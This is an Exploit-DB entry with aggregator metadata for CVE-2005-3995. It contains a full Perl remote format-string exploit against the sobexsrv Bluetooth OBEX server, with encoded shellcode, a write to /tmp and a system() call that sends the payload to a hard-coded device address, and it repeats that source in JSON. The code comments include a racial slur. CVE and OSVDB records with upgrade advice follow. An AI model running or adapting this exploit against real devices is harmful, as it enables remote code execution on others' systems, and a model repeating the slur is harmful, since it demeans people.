ID EDB-ID:1355
Type exploitdb
Reporter Kevin Finisterre
Modified 2005-12-03T00:00:00
Description
sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit. CVE-2005-3995. Remote exploit for linux platform
#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch!
#
$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents.
# R_386_JUMP_SLOT exit()
$addy = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";
$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;
$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;
#print "hi: $hi\n";
#print "lo: $lo\n";
$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";
$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";
open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);
system($string);
# milw0rm.com [2005-12-03]
{"id": "EDB-ID:1355", "type": "exploitdb", "bulletinFamily": "exploit", "title": "sobexsrv 1.0.0_pre3 Bluetooth syslog Remote Format String Exploit", "description": "sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit. CVE-2005-3995. Remote exploit for linux platform", "published": "2005-12-03T00:00:00", "modified": "2005-12-03T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1355/", "reporter": "Kevin Finisterre", "references": [], "cvelist": ["CVE-2005-3995"], "lastseen": "2016-01-31T14:03:33", "viewCount": 6, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-01-31T14:03:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3995"]}, {"type": "osvdb", "idList": ["OSVDB:21567"]}], "modified": "2016-01-31T14:03:33", "rev": 2}, "vulnersScore": 6.6}, "sourceHref": "https://www.exploit-db.com/download/1355/", "sourceData": "#!/usr/bin/perl\n# \n# trifinite.group Bluetooth sobexsrv remote syslog() exploit\n# code by kf_lists[at]digitalmunition[dot]com\n#\n# http://www.digitalmunition.com\n#\n# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!\n# Big ups to d4yj4y beeeeeeeeeeeeeotch! \n#\n$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. \n\n# R_386_JUMP_SLOT exit()\n$addy = \"\\x5a\\x19\\x05\\x08\";\n$addy2 = \"\\x58\\x19\\x05\\x08\";\n\n$lo = ($retloc >> 0) & 0xffff;\n$hi = ($retloc >> 16) & 0xffff;\n\n$hi = $hi - 0x38;\n$lo = (0x10000 + $lo) - $hi - 0x38;\n\n#print \"hi: $hi\\n\";\n#print \"lo: $lo\\n\";\n\n$string = \"./ussp-push 00:0B:0D:63:0B:CC\\@1 /tmp/shellcode \" . \"$addy$addy2%$hi.d%27\\\\\\$hn%$lo.d%28\\\\\\$hn\" . \"\\x41\" x 200;\n#print $string . \"\\n\";\n\n$sc = \"\\x90\" x 31 . # Metasploit /usr/bin/id shellcode \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4c\\x46\\x4b\\x50\\x4a\\x35\".\n\"\\x49\\x39\\x44\\x55\\x48\\x46\\x4a\\x46\\x4d\\x52\\x43\\x36\\x49\\x58\\x47\\x4e\".\n\"\\x4a\\x56\\x4f\\x52\\x43\\x57\\x4a\\x46\\x42\\x50\\x4a\\x56\\x4f\\x32\\x44\\x56\".\n\"\\x49\\x46\\x50\\x56\\x49\\x58\\x43\\x4e\\x44\\x45\\x4a\\x4e\\x4e\\x30\\x42\\x30\".\n\"\\x42\\x30\\x42\\x50\\x4f\\x32\\x45\\x47\\x43\\x57\\x44\\x47\\x4f\\x32\\x44\\x56\".\n\"\\x49\\x36\\x50\\x46\\x4f\\x52\\x49\\x56\\x46\\x36\\x42\\x50\\x47\\x45\\x43\\x35\".\n\"\\x49\\x58\\x41\\x4e\\x4d\\x4c\\x42\\x38\\x5a\";\n\nopen(F, \"> /tmp/shellcode\") or die \"can't open file\";\nprint F \"$sc\\n\";\nclose(F);\n\nsystem($string);\n\n# milw0rm.com [2005-12-03]\n", "osvdbidlist": ["21567"]}
{"cve": [{"lastseen": "2020-12-09T19:22:22", "description": "Format string vulnerability in the dosyslog function in the OBEX server (obexsrv.c) for Sobexsrv before 1.0.0-pre4, when the syslog (-S) function is enabled, allows remote attackers to execute arbitrary code via format string specifiers in file name arguments to OBEX commands.", "edition": 5, "cvss3": {}, "published": "2005-12-05T00:03:00", "title": "CVE-2005-3995", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-3995"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/a:sobexsrv:sobexsrv:1.0.0_pre3"], "id": "CVE-2005-3995", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3995", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sobexsrv:sobexsrv:1.0.0_pre3:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3995"], "edition": 1, "description": "## Solution Description\nUpgrade to version 1.0.0.pre4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.mulliner.org/bluetooth/sobexsrv.php\nOther Advisory URL: http://www.securiteam.com/unixfocus/6B0012AEVK.html\nOther Advisory URL: http://www.digitalmunition.com/DMA[2005-1202a].txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0121.html\nFrSIRT Advisory: ADV-2005-2711\n[CVE-2005-3995](https://vulners.com/cve/CVE-2005-3995)\nBugtraq ID: 15692\n", "modified": "2005-12-02T00:20:30", "published": "2005-12-02T00:20:30", "href": "https://vulners.com/osvdb/OSVDB:21567", "id": "OSVDB:21567", "title": "sobexsrv -S Parameter Format String Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
